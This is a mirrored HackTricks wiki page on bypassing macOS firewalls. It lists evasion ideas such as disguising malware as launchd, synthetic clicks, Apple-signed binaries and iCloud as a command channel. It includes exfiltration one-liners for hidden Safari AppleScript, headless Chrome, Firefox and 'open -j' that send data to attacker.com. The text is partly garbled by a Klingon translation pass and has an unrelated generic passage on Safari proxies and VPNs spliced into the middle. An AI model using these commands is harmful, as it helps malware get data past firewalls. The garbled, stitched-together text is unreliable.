Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

6.1 KiB
Raw Permalink Blame History

macOS Bypassing Firewalls

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Found techniques

The following techniques were found working in some macOS firewall apps.

Abusing whitelist names

  • For example calling the malware with names of well known macOS processes like launchd

Synthetic Click

  • If the firewall ask for permission to the user make the malware click on allow

Use Apple signed binaries

  • Like curl, but also others like whois

Well known apple domains

The firewall could be allowing connections to well known apple domains such as apple.com or icloud.com. And iCloud could be used as a C2.

Generic Bypass

Some ideas to try to bypass firewalls

Check allowed traffic

Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them

lsof -i TCP -sTCP:ESTABLISHED

DNS vItlhutlh

DNS resolutions mdnsreponder signed application vItlhutlh contact DNS servers.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Browser apps qar'a'wI'

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}* Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

Safari

Introduction

Safari is the default web browser for macOS. It is known for its speed and efficiency, as well as its strong security features. However, there are still ways to bypass its security measures and gain unauthorized access to sensitive information.

Bypassing Firewalls

1. Proxy Servers

One way to bypass firewalls in Safari is by using proxy servers. Proxy servers act as intermediaries between your computer and the websites you visit, allowing you to access blocked content. By configuring Safari to use a proxy server, you can bypass firewall restrictions and access restricted websites.

To configure a proxy server in Safari, follow these steps:

  1. Open Safari and go to Preferences.
  2. Click on the Advanced tab.
  3. Click on the Change Settings button next to Proxies.
  4. Select the Web Proxy (HTTP) option and enter the IP address and port number of the proxy server.
  5. Click OK to save the changes.

2. VPNs

Another way to bypass firewalls in Safari is by using a Virtual Private Network (VPN). A VPN creates a secure connection between your computer and a remote server, encrypting your internet traffic and hiding your IP address. By connecting to a VPN server, you can bypass firewall restrictions and access blocked websites.

To use a VPN in Safari, follow these steps:

  1. Install a VPN client on your computer.
  2. Open the VPN client and connect to a VPN server.
  3. Once connected, open Safari and browse the internet as usual.

Conclusion

While Safari is a secure web browser, it is still possible to bypass its security measures and gain unauthorized access to sensitive information. By using proxy servers or VPNs, you can bypass firewalls and access blocked content. However, it is important to use these techniques responsibly and ethically.

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via processes injections

If you can inject code into a process that is allowed to connect to any server you could bypass the firewall protections:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: